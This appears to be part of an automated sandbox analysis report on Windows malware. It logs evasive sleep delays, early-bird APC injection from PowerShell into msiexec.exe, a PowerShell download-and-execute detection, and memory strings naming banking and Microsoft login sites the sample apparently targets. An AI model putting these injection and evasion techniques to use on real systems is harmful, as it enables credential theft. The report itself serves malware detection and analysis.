              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598795Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598685Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598576Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598463Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597035Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596264Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596045Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595897Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595777Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595650Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595541Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7502Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2329Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6916Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2846Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6908Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6324Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7140Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5532Thread sleep count: 1683 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5532Thread sleep count: 8170 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599343s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598795s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598685s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598576s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598463s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598359s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598250s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598140s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -598031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597265s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -597035s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596264s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -596045s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595897s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595777s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595650s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595541s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595187s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -594968s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -594750s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -594640s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352Thread sleep time: -594531s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598795Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598685Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598576Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598463Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597035Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596264Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596045Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595897Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595777Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595650Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595541Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594531Jump to behavior
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: svchost.exe, 00000008.00000002.2217806940.0000025D1C45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2216286206.0000025D16E2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002CB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: powershell.exe, 00000003.00000002.1250880884.000002759B3BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW l
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07020D20 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,6_2_07020D20

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_6564.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
